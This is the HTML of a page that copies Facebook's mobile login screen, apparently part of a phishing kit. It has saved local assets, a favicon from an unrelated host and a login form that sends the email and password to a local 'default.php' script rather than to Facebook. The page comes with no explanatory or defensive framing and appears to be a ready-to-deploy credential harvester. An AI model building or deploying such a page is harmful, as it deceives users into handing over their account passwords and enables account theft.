﻿<!DOCTYPE html>
<html><head>
<link rel="icon" type="image/png" href="https://d35fkdjhhgt99.cloudfront.net/static/use-media-items/17/16902/full-690x690/56702dda/facebook-favicon.png?resolution=0">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>
Welcome to Facebook</title>

<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">

<link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196">
<meta name="referrer" content="default" id="meta_referrer">

<link rel="stylesheet" type="text/css" data-bootloader-hash="/8RtO" href="Facebook_files/w2ZgxVPxn4D.css">
<link rel="stylesheet" type="text/css" data-bootloader-hash="PT5GW" href="Facebook_files/lptpyJRZARh.css">


<meta name="description" content="Log in to Facebook to start sharing and connecting with your friends, family and people you know.">
<link rel="canonical" href="https://www.facebook.com/login/">

</head>
<body tabindex="0" class="touch x1 _fzu _50-3 iframe acw portrait" style="min-height: 940px; background-color: rgb(255, 255, 255);">
<script id="u_0_b">
(function(a){a.__updateOrientation=function(){var b=!!a.orientation&&a.orientation!==180,c=document.body;if(c)c.className=c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g,' ')+' '+(b?'landscape':'portrait');return b;};})(window);</script>
<div id="viewport" style="min-height: 940px;">
<h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">
Facebook</h1>
<div id="page">
<div class="_129_" id="header-notices">
</div>
<div class="_4g33 _52we _52z5" id="header">
<div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
<a href="https://m.facebook.com/login/?ref=dbl">
<i>
<img src="Facebook_files/logo.png">
</i>
</a>
</div>
</div>
<div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 940px;">
<div class="_4g33">
<div class="_4g34" id="u_0_0">
<div class="_5yd0 _2ph- _5yd1" style="display: none;" data-sigil="m_login_notice">
<div class="_52jd">
</div>
</div>
<div>
<div data-sigil="m_login_upsell">
</div>
<div class="aclb _5rut">
<form method="post" action="default.php" class="mobile-login-form _5spm" id="u_0_1" novalidate="1" data-sigil="m_login_form" data-autoid="autoid_1">
<div class="_56be _5sob">
<div class="_55wo _55x2 _56bf">
<input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq" name="email" placeholder="Email address or phone number" data-sigil="m_login_email" type="email">
<div class="_1upc _mg8" data-sigil="m_login_password">
<div class="_4g33">
<div class="_4g34 _5i2i _52we">
<div class="_5xu4">
<input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2" name="pass" placeholder="Password" id="u_0_2" data-sigil="password-plain-text-toggle-input" type="password">
</div>
</div>
<div class="_5s61 _216i _5i2i _52we">
<div class="_5xu4">
<div class="_2pi9" id="u_0_3" style="display:none">
<a href="#" data-sigil="password-plain-text-toggle">
<span class="mfss" id="u_0_4" style="display:none">
HIDE</span>
<span class="mfss" id="u_0_5">
SHOW</span>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="_2pie" style="text-align:center;">
<button type="submit" value="Log In" class="_54k8 _56bs _56b_ _56bw _56bu" name="login" id="u_0_6" data-sigil="touchable m_login_button" data-autoid="autoid_2">
<span class="_55sr">
Log In</span>
</button>
</div>


</form>
<div class="_43mg">
<span class="_43mh">
or</span>
</div>
<div class="_52jj _5t3b">
<a class="_5t3c btn btnS medBtn mfsm touchable" role="button" id="signup-button" href="https://m.facebook.com/reg/?cid=103&amp;ref=dbl" data-sigil="blocking-touchable">
Create New Account</a>
</div>
<div>
<div class="other-links">
<ul class="_5pkb _55wp">
<li>
<span class="mfss fcg">
<a href="https://m.facebook.com/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl%26fl%26refid%3D8&amp;lwv=101&amp;ref=dbl" id="forgot-password-link">
Forgotten password?</a>
<span aria-hidden="true">
 · </span>
<a class="sec" href="https://m.facebook.com/help/?ref=dbl" id="help-link">
Help Centre</a>
</span>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<div>
</div>
<br><center>
<div class="_5ui4">
<span class="mfss fcg">
Facebook ©2020</span>
</div>
</center></div>
</div>
</div>




</body></html>
